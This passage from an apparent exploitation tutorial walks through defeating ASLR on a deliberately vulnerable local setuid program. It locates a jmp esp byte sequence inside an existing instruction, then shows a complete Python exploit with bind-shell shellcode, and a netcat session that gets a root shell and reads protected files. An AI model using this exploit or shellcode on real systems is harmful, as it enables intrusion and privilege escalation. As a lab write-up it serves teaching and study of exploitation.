e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="go" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="go" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="go" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="go" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="go" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="go" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="go" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="go" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="go" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="go" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="go" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="go" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"span class="go" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="go" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="go" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="go" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="go" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"/code/pre/div /td/tr/table pHowever, we do have another option. codeobjdump/code shows the instructions as they would be run by the processor during normal operations, you don't necessarily have to use them this way, you can instead start execution in the middle of an instruction to create a new instruction./p pThis is what we are going to try to do (this was the reason for the extra check in the application too, as you will see)./p pFirst we need to figure out what a href="https://en.wikipedia.org/wiki/Opcode" target="_blank"opcodes/a codejmp esp/code results in, we start by creating a simple assembly application with just codejmp esp/code in it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nb"esp/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble and link it; and then disassemble it with codeobjdump/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spannasm -f elf32 -o jesp.o jesp.nasm /span span class="code-line"span class="gp"appuser@dev:~$ /spanld -o jesp jesp.o/span span class="code-line"span class="gp"appuser@dev:~$ /spanobjdump -d ./jesp -M intel/span span class="code-line"/span span class="code-line"span class="go"./jesp: file format elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="go"Disassembly of section .text:/span/span span class="code-line"/span span class="code-line"span class="go"08048060 lt;_startgt;:/span/span span class="code-line"span class="go" 8048060: ff e4 jmp esp/span/span span class="code-line"/code/pre/div /td/tr/table pSo all we need to do is find codeff e4/code anywhere in the application code. A quick grep find us an instruction that contains this sequence:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep span class="s1"#39;ff e4#39;/span/span span class="code-line"span class="go" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the compare to code58623/code on line 104 of the source code above, code58623/code is actually codee4ff/code in hex and its stored as codeff e4/code because we are using a a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a system./p pThe start of this instruction is at the memory address code08048ccd/code and our codejmp esp/code is 3 bytes in, so just plus 3 to code08048ccd/code and we get code08048cd0/code. This is the address we will overwrite the return address with./p h2Exploiting The App/h2 pUsing all of the information we've retrieved so far we can build our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;Aquot;/span span class="o"*/span span class="mi"532/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xd0\x8c\x04\x08/spanspan class="s2"quot;/span span class="c1"# the address of our 0xff 0xe4/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"20/span span class="c1"# nop sled/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table pThe only changes here are, before we overwrite the return address we only send codeA/code's (532 of them, 528 for the local variables and 4 for the saved EBP), then we put our return address (the address of codejmp esp/code strong08048cd0/strong) and lastly we stick our a href="https://en.wikipedia.org/wiki/NOP_slide" target="_blank"NOP sled/a and shellcode (the NOP sled isn't actually needed though as we know ESP will point to the start of our code)./p pWe can now exploit the application, first run the app again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pNow launch the exploit and connect to our shell:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-exploit2.py /span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"pwd/span/span span class="code-line"span class="go"/home/appuser/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"ls -l/span/span span class="code-line"span class="go"total 32/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rwxr-xr-x 1 appuser appuser 486 Jul 8 11:16 jesp/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 32 Jul 8 11:08 jesp.nasm/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 432 Jul 8 11:16 jesp.o/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="go"cat token/span/span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="go"cat secret.txt/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!! :-)/p h2Conclusion/h2 pWhile ASLR makes it more difficult to exploit a vulnerability, it doesn't make it impossible. You do, however, need to understand how the stack works more than if ASLR is disabled./p pAlso, if you need to use instructions from inside the application code, you aren't restricted to the normal instructions executed by the application at runtime. You can jump into the middle of an instruction to create an entirely new instruction to run./p pThis idea of using bits of instructions (or gadgets) is the beginning of a href="https://en.wikipedia.org/wiki/Return-oriented_programming" target="_blank"return-oriented programming ROP/a, which we will use more extensively later./p pHappy Hacking :-)/p
❌